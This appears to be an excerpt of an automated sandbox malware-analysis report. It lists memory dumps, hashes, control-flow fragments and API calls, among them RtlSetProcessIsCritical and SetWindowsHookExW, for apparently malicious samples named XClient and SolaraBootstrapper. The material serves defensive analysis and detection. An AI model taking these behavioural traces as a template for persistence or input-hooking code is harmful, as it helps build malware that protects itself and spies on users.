                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Time$System$FileLocalSpecific
                                                                      • String ID: [oV116
                                                                      • API String ID: 1707611234-247592185
                                                                      • Opcode ID: 885b147e6b65c9f36e7e75731fd1a19d48845f052dfaffbc4ee39426e9b27c1b
                                                                      • Instruction ID: 84884dae8713d57ed8c154fa9b259f0d7eca3b2006595357354648559d67ca4d
                                                                      • Opcode Fuzzy Hash: 885b147e6b65c9f36e7e75731fd1a19d48845f052dfaffbc4ee39426e9b27c1b
                                                                      • Instruction Fuzzy Hash: E4118F2161C692C1EB64AB11A41103EF7A1FB89765F900235FEAD81EE9FF2CD014DB20
                                                                      APIs
                                                                        • Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9
                                                                      • GetEnvironmentVariableW.KERNEL32(00007FF76D5C365F), ref: 00007FF76D5C7E47
                                                                      • ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF76D5C7E69
                                                                        • Part of subcall function 00007FF76D5C8760: WideCharToMultiByte.KERNEL32(?,?,00007FF76D5C34B3,?,00007FF76D5C3534), ref: 00007FF76D5C87A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharEnvironmentMultiWide$ExpandStringsVariable
                                                                      • String ID: [oV116
                                                                      • API String ID: 1103021425-247592185
                                                                      • Opcode ID: 8faec15fd92c035058c17447badd45038b2d3dc0e4a8fa448e2071833699defb
                                                                      • Instruction ID: 2b81ae56ec7a307f02ea565533adf47b34f5ae4e68ce9b7e4ca3aba71878a395
                                                                      • Opcode Fuzzy Hash: 8faec15fd92c035058c17447badd45038b2d3dc0e4a8fa448e2071833699defb
                                                                      • Instruction Fuzzy Hash: 7B018456F2C696C1FB30BB21E4593BA9255EB98785FC04035DB4D92D86ED3CD1048F24
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: Error$[oV116
                                                                      • API String ID: 2030045667-1857628245
                                                                      • Opcode ID: 4e05cee4fd0387c749ad16b8ffcff93906d9d1e3285c9c5f37b12be0ab4e678e
                                                                      • Instruction ID: 0762a9370db49c87abef8da2236226eac29239709df71e9119794b328b6963ec
                                                                      • Opcode Fuzzy Hash: 4e05cee4fd0387c749ad16b8ffcff93906d9d1e3285c9c5f37b12be0ab4e678e
                                                                      • Instruction Fuzzy Hash: 23018F32628B81C1E720AB10F455BA973A8FB88BC4F914035DE9C17A46DF3DD615CB50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: Warning$[oV116
                                                                      • API String ID: 2030045667-1833381359
                                                                      • Opcode ID: 30b688256be6176580ba4bf51bf18ff376a5b504d8ca08eaaab4825b13796874
                                                                      • Instruction ID: 570779e5b175e6f350ca577625d5769d6b94130dc2bae878b6e56facfd033325
                                                                      • Opcode Fuzzy Hash: 30b688256be6176580ba4bf51bf18ff376a5b504d8ca08eaaab4825b13796874
                                                                      • Instruction Fuzzy Hash: 22018F32628B81C1E720AB10F455BA973A8FB88BC4F914035DE9C57A46DF3DD615CB50
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true
                                                                      • Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: 00007E133019
                                                                      • String ID: winFileSize$winShmMap1$winShmMap2$winShmMap3
                                                                      • API String ID: 3999650332-2257004166
                                                                      • Opcode ID: c0812779f35bdf8fb4ff101661a4324d3c7486eb6dbe2245d40ced781f00964f
                                                                      • Instruction ID: af853720f02ca73240658f300d75e072fa3873901d786e87f8d35dd1f442362b
                                                                      • Opcode Fuzzy Hash: c0812779f35bdf8fb4ff101661a4324d3c7486eb6dbe2245d40ced781f00964f
                                                                      • Instruction Fuzzy Hash: 6481807AB0874286EBA19F24D420AA977B2FB88B98F544135DE5D477DDDF3CD8018B40
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true
                                                                      • Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
                                                                      • API String ID: 0-3485574213
                                                                      • Opcode ID: c3a0c4bb02d0cc88bbfcb6bdef12194fa9fb737831e58f40694e07a1dd3468d1
                                                                      • Instruction ID: 750cda95f4407dbf37f62f8a32b301f745ae377b9a5b7fe5cafc8ecb7e7a1e74
                                                                      • Opcode Fuzzy Hash: c3a0c4bb02d0cc88bbfcb6bdef12194fa9fb737831e58f40694e07a1dd3468d1
                                                                      • Instruction Fuzzy Hash: E641F56AB0C69246FB22CB15E5609F977A4EF41B84F841032DAAD877DEDF2CE505C701
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true
                                                                      • Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: cannot commit - no transaction is active$cannot commit transaction - SQL statements in progress$cannot rollback - no transaction is active$cannot start a transaction within a transaction
                                                                      • API String ID: 0-3785649666
                                                                      • Opcode ID: ec8afc50874c8b374021a13efecbf03a1c2bc4e578d83d22d797aacaf1fc7505
                                                                      • Instruction ID: 0def4582598c097e56f79499f426459b26cbcedbf1076027ed84dc133974deeb
                                                                      • Opcode Fuzzy Hash: ec8afc50874c8b374021a13efecbf03a1c2bc4e578d83d22d797aacaf1fc7505
                                                                      • Instruction Fuzzy Hash: 3831D23AB092A686EB958B2584A4FFA23E5EF41790F515431DA3E577C8DE7CE800C700
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true
                                                                      • Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24$misuse
                                                                      • API String ID: 0-2403070753
                                                                      • Opcode ID: 2c17204bd465ef3aa51da54f296ed20640a67656409ad0f85c034fd7c71ddaae
                                                                      • Instruction ID: 88bd688cbc2b0a6b5fdc2d23d55302c07db760662984c14babd3aaf6ec184811
                                                                      • Opcode Fuzzy Hash: 2c17204bd465ef3aa51da54f296ed20640a67656409ad0f85c034fd7c71ddaae
                                                                      • Instruction Fuzzy Hash: 81219029F0C61282EF52DB25E160FF967B1AF45B98F440031DA2D47BDADF2CE4958740

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2846750917.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ffd9b2a0000_XClient.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 580069804fe27d39a6bc7a7a718d038518c0e56009e571898c1820356d735bae
                                                                      • Instruction ID: 9d6faafd36cc4a00f6e61fe9377e5824a618a532aecd72436e248a0a6bfde75e
                                                                      • Opcode Fuzzy Hash: 580069804fe27d39a6bc7a7a718d038518c0e56009e571898c1820356d735bae
                                                                      • Instruction Fuzzy Hash: 5B514932B08A298FD714BF9DE855AE9B7E0FF95372F04413FD18AC7282DA64644687D0

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 382 7ffd9b2a3221-7ffd9b2a3225 383 7ffd9b2a3227-7ffd9b2a3228 382->383 384 7ffd9b2a322a-7ffd9b2a3239 382->384 383->384 385 7ffd9b2a323c-7ffd9b2a3300 RtlSetProcessIsCritical 384->385 386 7ffd9b2a323b 384->386 390 7ffd9b2a3308-7ffd9b2a333d 385->390 391 7ffd9b2a3302 385->391 386->385 391->390
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2846750917.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ffd9b2a0000_XClient.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalProcess
                                                                      • String ID:
                                                                      • API String ID: 2695349919-0
                                                                      • Opcode ID: 8636694b994b954f08a80243552a830c01c3ea84999102bc60a8265e046130c7
                                                                      • Instruction ID: 321144bdf28ec6fe5e4757938d05b7d5c047cebe3407129d5914fc548138a582
                                                                      • Opcode Fuzzy Hash: 8636694b994b954f08a80243552a830c01c3ea84999102bc60a8265e046130c7
                                                                      • Instruction Fuzzy Hash: 1641233190C6588FDB29DFA8D856AFA7BF0FF56311F14416FE08AC3592CB646842CB91

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 393 7ffd9b2a3438-7ffd9b2a343f 394 7ffd9b2a344a-7ffd9b2a34bd 393->394 395 7ffd9b2a3441-7ffd9b2a3449 393->395 399 7ffd9b2a3549-7ffd9b2a354d 394->399 400 7ffd9b2a34c3-7ffd9b2a34d0 394->400 395->394 401 7ffd9b2a34d2-7ffd9b2a350f SetWindowsHookExW 399->401 400->401 403 7ffd9b2a3517-7ffd9b2a3548 401->403 404 7ffd9b2a3511 401->404 404->403
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2846750917.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ffd9b2a0000_XClient.jbxd
                                                                      Similarity
                                                                      • API ID: HookWindows
                                                                      • String ID:
                                                                      • API String ID: 2559412058-0
                                                                      • Opcode ID: 7cbcd626ff589d2f4373add5d491170de67612b6b37a4f7a365a298ea942133f
                                                                      • Instruction ID: 913d04fc997ef5a44bc7d037aba912dd4eec69eb961d20766a26fae4674bab61
                                                                      • Opcode Fuzzy Hash: 7cbcd626ff589d2f4373add5d491170de67612b6b37a4f7a365a298ea942133f
                                                                      • Instruction Fuzzy Hash: D041F531A1CA4D4FDB58EF6C98566F9BBE1EB59321F10427ED059C32D2CE64A8128781
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 059416c97a2bfb16dfa82a9fe3fe3943dcb849ef247879baca4e55a2c5bbc6e7
                                                                      • Instruction ID: 5aa07da274050bd00151dee913701d89230d38e1e443cb2e458ec3a861105ce9
                                                                      • Opcode Fuzzy Hash: 059416c97a2bfb16dfa82a9fe3fe3943dcb849ef247879baca4e55a2c5bbc6e7
                                                                      • Instruction Fuzzy Hash: A3F1F274D05229CFDB28DF65D984BEDBBB2FB8A300F1095AA944AA7354DB305E85CF00
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 13348947f947de0ba2fea8c8ca44795162d17cdc2863eefe559a806febd3d188
                                                                      • Instruction ID: 7130f70bf20dda4cf9746a918f3df9323875c6ea3da90fccac4341a3e03bf030
                                                                      • Opcode Fuzzy Hash: 13348947f947de0ba2fea8c8ca44795162d17cdc2863eefe559a806febd3d188
                                                                      • Instruction Fuzzy Hash: BBE10574D05229CFDB28DF65D988BDDBBB2FB89300F1095AA845AA7264DB705E85CF00
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 18e9534b1b083296dba43f39b2c61883032eaa05a17363e164cf32bab53648aa
                                                                      • Instruction ID: e9252f83cb30d27a973f6f939ec96d916922068661c71d847369d60704fe35c6
                                                                      • Opcode Fuzzy Hash: 18e9534b1b083296dba43f39b2c61883032eaa05a17363e164cf32bab53648aa
                                                                      • Instruction Fuzzy Hash: 79011978D08248EFCB16DFB4D4446ADBFB1EF4A300F1085AAD859A7266E7355A42CF41
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9a0bd9d51eef2506a45868c6ce8d3c446b4db4e163f57d5f02be0188738de7b5
                                                                      • Instruction ID: 611d285d89fcb3b4b4a7e4d6ea2d6077eacb6502a4eb98f71a14eb53f043d8b6
                                                                      • Opcode Fuzzy Hash: 9a0bd9d51eef2506a45868c6ce8d3c446b4db4e163f57d5f02be0188738de7b5
                                                                      • Instruction Fuzzy Hash: BEC1F274D05229CFDB28EF60D988BEDBBB1FB4A300F2055AAC45AA7254DB705E85CF14
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c2afc51a96529bdfe0fb4d78b43055aef50a3c9555a4aa78794b204a5214522b
                                                                      • Instruction ID: 03d1312771e644e8875e0d35d44a9b2c1c92939acd87345bdf91e2787b9831c0
                                                                      • Opcode Fuzzy Hash: c2afc51a96529bdfe0fb4d78b43055aef50a3c9555a4aa78794b204a5214522b
                                                                      • Instruction Fuzzy Hash: 0FC1F374D05229CFCB28EF60D988BEDBBB1FB4A301F1055AA849AA7354DB705E85CF04
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9d591c0e6a5cf25a49075b1f623ef801d4ed5de20f755d0997b46a202939b82a
                                                                      • Instruction ID: ed9a6dc5fceea4ea76f2f8d35049fb1369d96128197ee219d6c9e32f95e3a742
                                                                      • Opcode Fuzzy Hash: 9d591c0e6a5cf25a49075b1f623ef801d4ed5de20f755d0997b46a202939b82a
                                                                      • Instruction Fuzzy Hash: A1413874D052298FCB65EF64C858BEDBBB1FB4A300F2058AAD04AA7354DB304E95CF44
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d81a1255513a2832da4183c1631d225ee024af4b1eb3e53e8c2ccd19d44c7cf0
                                                                      • Instruction ID: ec8cdc771cdaeb5a8c15c0d18a5d469bdbeaa220dcb329354f95e9d9f98cf874
                                                                      • Opcode Fuzzy Hash: d81a1255513a2832da4183c1631d225ee024af4b1eb3e53e8c2ccd19d44c7cf0
                                                                      • Instruction Fuzzy Hash: C041F674E05208AFDB54DFA9D890AADBBB2FF89300F10852EE845BB355DB305846CF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1753934685.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_a7d000_SolaraBootstrapper.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 719bcc754e650ccfd0a2f47fca12a3990b552162bebbdbb681420a49dc58e80c
                                                                      • Instruction ID: bf8843dd554538be3a54ec58c24f6dcbe940403634ca0f6247a6610e9e3947cb
                                                                      • Opcode Fuzzy Hash: 719bcc754e650ccfd0a2f47fca12a3990b552162bebbdbb681420a49dc58e80c
                                                                      • Instruction Fuzzy Hash: A721BDB6604340EFCB059F54DD84B66BBB6FF98324F24C569E90D0A246C336D817DBA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1753934685.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_a7d000_SolaraBootstrapper.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3660dfe55a9ec3abc1fd528c2c7e977daaa4d4c3ae68719e8bb560421c7628fc
                                                                      • Instruction ID: 03aea56c0cfcd7f20d4c5b795a6e184e2332016d2f7e5cd5b8ff886294d47a7d
                                                                      • Opcode Fuzzy Hash: 3660dfe55a9ec3abc1fd528c2c7e977daaa4d4c3ae68719e8bb560421c7628fc
                                                                      • Instruction Fuzzy Hash: 1A219D76504280DFCB06CF54D9C4B56BF72FB88324F24C5A9D9090A656C33AD81ACBA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 63b9d6d11b6807c2a9cfb749c58125b842ae02ac4dc8d957f12f57c761be4aec
                                                                      • Instruction ID: 1190db771362a6413c2af5b9f83e2280b51147ccd26fb288f816cd6350ee7a37
                                                                      • Opcode Fuzzy Hash: 63b9d6d11b6807c2a9cfb749c58125b842ae02ac4dc8d957f12f57c761be4aec
                                                                      • Instruction Fuzzy Hash: E9F0B278E002199FCB64DFA8D880A9CBBB0FF88310F1084AAD519E7320DB309940CF00
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1754204032.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_ad0000_SolaraBootstrapper.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d8f1403e245d045f38b390a45c4b641d8a6c687bfb45a596cbfa23fc90e96f19
                                                                      • Instruction ID: b3c645c0d69c16e8b1297d2c2cbfc2d54e3ac2ae47a8b91fa34ead2b940b0e7c
                                                                      • Opcode Fuzzy Hash: d8f1403e245d045f38b390a45c4b641d8a6c687bfb45a596cbfa23fc90e96f19
                                                                      • Instruction Fuzzy Hash: A7F065719093449FCB01DFB4D906BDC7BB4EB05314F514995DC499B262E7301E05D751